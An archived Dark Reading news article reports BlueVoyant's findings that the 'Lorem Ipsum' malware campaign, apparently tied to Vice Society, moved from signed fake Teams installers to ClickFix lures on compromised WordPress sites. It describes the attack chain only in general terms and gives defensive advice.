Dark ReadingArchived Jun 16, 2026✓ Full text saved
New analysis shows the campaign, which uses compromised WordPress sites, may be linked to the ransomware and data extortion group Vice Society.
Full text archived locally
✦ AI Summary· Claude Sonnet
CYBERATTACKS & DATA BREACHES
CYBER RISK
THREAT INTELLIGENCE
NEWS
'Lorem Ipsum' Malware Pivots to ClickFix Delivery
New analysis shows the campaign, which uses compromised WordPress sites, may be linked to the ransomware and data extortion group Vice Society.
Jai Vijayan,Contributing Writer
June 16, 2026
4 Min Read
SOURCE: M REHAN330 VIA SHUTTERSTOCK
Microsoft's disruption of malware-signing-as-a-service provider Fox Tempest last month has forced the operators of the Lorem Ipsum shellcode loader and backdoor to abandon their delivery method of Trojanized Microsoft Teams installers in favor of ClickFix lures.
Researchers at BlueVoyant, who have tracked the Lorem Ipsum campaign since February 2026, observed the shift in late May, just days after Microsoft dismantled the Fox Tempest (aka Forging Marauder) infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates. While the takedown may have temporarily disrupted the threat actors behind Lorem Ipsum, they quickly moved to a new and potentially more dangerous delivery model.
Making a Quick Pivot to ClickFix
"The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely," BlueVoyant said in its report on Tuesday.
Related:The Beginning of the End of Social Engineering
Instead, the threat actors are now relying on ClickFix lures hosted on compromised WordPress sites to deliver their malware. "The pivot significantly broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites," the company noted.
BlueVoyant had initially assessed Lorem Ipsum, to be a rapidly maturing malware campaign likely operated by a sophisticated, mid-tier initial access broker that launched in February 2026. The company has since revised that assessment and now strongly believes the campaign is linked to Rapid Brigantine, a financially motivated cybercriminal group also tracked as Vanilla Tempest, DEV-0832, and Vice Society. The threat actor has been active since at least mid-2022 and is associated with multiple ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker, according to BlueVoyant.
The Lorem Ipsum campaign initially relied on SEO poisoning to lure users into downloading Trojanized Microsoft Teams installers signed with valid Microsoft Trusted Signing certificates. Victims who ran the fake installers unknowingly deployed a multistage shellcode loader and backdoor that gave the attackers a foothold on their systems.
BlueVoyant's analysis found Lorem Ipsum using a sophisticated, multistage infection chain with DLL sideloading, encrypted payloads, and a command-and-control (C2) mechanism that abused the legitimate Indian blogging platform LetsDiskuss[.]com as a dead-drop to retrieve C2 server addresses. The malware also assigns unique identifiers to track and manage individual victim infections, according to BlueVoyant.
Related:Chinese, N. Korean Threat Groups Build on Asia-Pacific Success
ClickFix Lures on WordPress Sites
For the new ClickFix delivery model, Lorem Ipsum's operator is currently using at least five legitimate but compromised WordPress websites to host its ClickFix lures. The attack chain begins when a user arrives at one of the websites, which span multiple sectors including architecture, legal services and construction technology. An injected iframe on the website displays a fake browser update notification about the user's browser being out of date.
In a manner similar to other ClickFix scams, the pop-op instructs the user to paste a provided PowerShell command, disguised as a Microsoft Edge security intelligence update, into their Windows Terminal. Running that command silently downloads and executes the Lorem Ipsum malware in the background while displaying a fake success message telling the user their browser has been successfully updated.
A Troubling Connection to Ransomware Actors
BlueVoyant's view that Lorem Ipsum is linked to Rapid Brigantine is significant for defenders because it suggests the campaign is part of a broader ransomware operation with a history of deploying destructive payloads against victims. According to the security vendor, there are multiple indicators that the two operations are linked. These include a Microsoft report in October 2025 that described SEO poisoning-driven Vanilla Tempest campaign involving Teams installers; the shared use of Forging Marauder/Fox Tempest for obtaining malware signing certificates; and a DFIR report where a Lorem Ipsum-associated loader delivered a backdoor associated with Rapid Brigantine.
Related:Silent Ransom Group Hits US Law Firms in Escalating Extortion Attacks
The Lorem Ipsum campaign is the latest example of the resilience modern threat actors have built up against attempts to disrupt their operations. Rather than allowing Microsoft's takedown of the Fox Tempest signing service to disrupt their operations, Lorem Ipsum actors pivoted to a new delivery model that has actually heightened their threat profile.
For defenders, the broader implication is that detection and prevention strategies cannot rely on assumptions about initial access vectors. Instead, organizations need to anticipate fast-moving, multichannel delivery models that combine social engineering, legitimate Web infrastructure abuse, and user execution of malicious commands, BueVoyant noted.
"Defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators' demonstrated capacity for rapid pivot in response to disruption," the security vendor said. "The most operationally valuable controls focus on the consistent behaviors that span Rapid Brigantine's multiple delivery pipelines," rather than individual delivery mechanisms or malware variants.
About the Author
Jai Vijayan
Contributing Writer
Illinois-based Jai Vijayan is a veteran, award-winning technology journalist with more than 25 years of experience covering cybersecurity. His information security reporting has explored everything from ransomware, nation-state threats, and identity security to AI risk, critical infrastructure protection, software supply chain security, cloud security and emerging enterprise technologies.
Over the course of his career, Jai has written news stories, feature articles, survey reports, white papers, and e-books for enterprise and technology audiences. He has also moderated panel discussions and executive roundtables featuring CISOs, security researchers, and industry leaders.
Jai previously served as senior editor at Computerworld, where he covered information security and data-privacy issues. His work has also appeared in CSO Online, InformationWeek, The Christian Science Monitor Passcode, The Economic Times, and other publications.
His work has earned multiple industry honors, including a Joint ASBPE Excellence Award for Best Coverage of Government IT, and a Joint Jesse H. Neal Award for wireless LAN security coverage. Jai holds a Master’s degree in statistics from Bangalore University, and studied broadcasting and electronic communication at Marquette University in Milwaukee.
Want more Dark Reading stories in your Google search results?
ADD US NOW
More Insights
Industry Reports
How Organizations Are Managing Incident Response
How Enterprises Are Developing Secure Applications
Inside RSAC 2026: security leaders reveal the risks redefining your defense strategy
Essential News & Insights from Black Hat USA 2025
How Enterprises Are Harnessing Emerging Technologies in Cybersecurity
Access More Research
Webinars
Advanced Persistent Threats: A Practical Guide to Detection and Response
The Frontier AI Era: Why Cybersecurity Must Move at Machine Speed
Build vs. Buy: The Hidden Cost of Building Your Own AI Security Stack
Defending in the Shadow Era: When the CVE Feed Goes Dark
Building SecOps That Make the Most of Every Dollar
More Webinars
You May Also Like
CYBERATTACKS & DATA BREACHES
Critical Fortinet Flaws Under Active Attack
by Jai Vijayan, Contributing Writer
DEC 17, 2025
CYBERATTACKS & DATA BREACHES
CISA Warns of 'Ongoing' Brickstorm Backdoor Attacks
by Rob Wright
DEC 04, 2025
CYBERATTACKS & DATA BREACHES
F5 BIG-IP Environment Breached by Nation-State Actor
by Alexander Culafi
OCT 15, 2025
CYBERATTACKS & DATA BREACHES
Jaguar Land Rover Shows Cyberattacks Mean (Bad) Business
by Robert Lemos, Contributing Writer
OCT 03, 2025
Editor's Choice
CYBERSECURITY OPERATIONS
20 Leaders Who Built the CISO Era: 2 Decades of Change
byDark Reading Editorial Team
MAY 12, 2026
41 MIN READ
APPLICATION SECURITY
It's Patch Tuesday for Microsoft & Not a Zero-Day In Sight
byJai Vijayan
MAY 12, 2026
5 MIN READ
CYBERATTACKS & DATA BREACHES
Instructure Breach Exposes Schools' Vendor Dependence
byAlexander Culafi
MAY 6, 2026
4 MIN READ
Want more Dark Reading stories in your Google search results?
Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.
SUBSCRIBE
AUG 1-6 | MANDALAY BAY, LAS VEGAS USE CODE: DARKREADING & SAVE $200 ON A BRIEFINGS PASS OR $100 ON A BUSINESS PASS
The premier cybersecurity event returns.
GET YOUR PASS
ANATOMY OF A DATA BREACH
This comprehensive virtual event examines the main vulnerabilities and exploits that lead to enterprise data breaches, plus the latest tools and best practices for conducting incident response.
BEAT HACKERS TO IT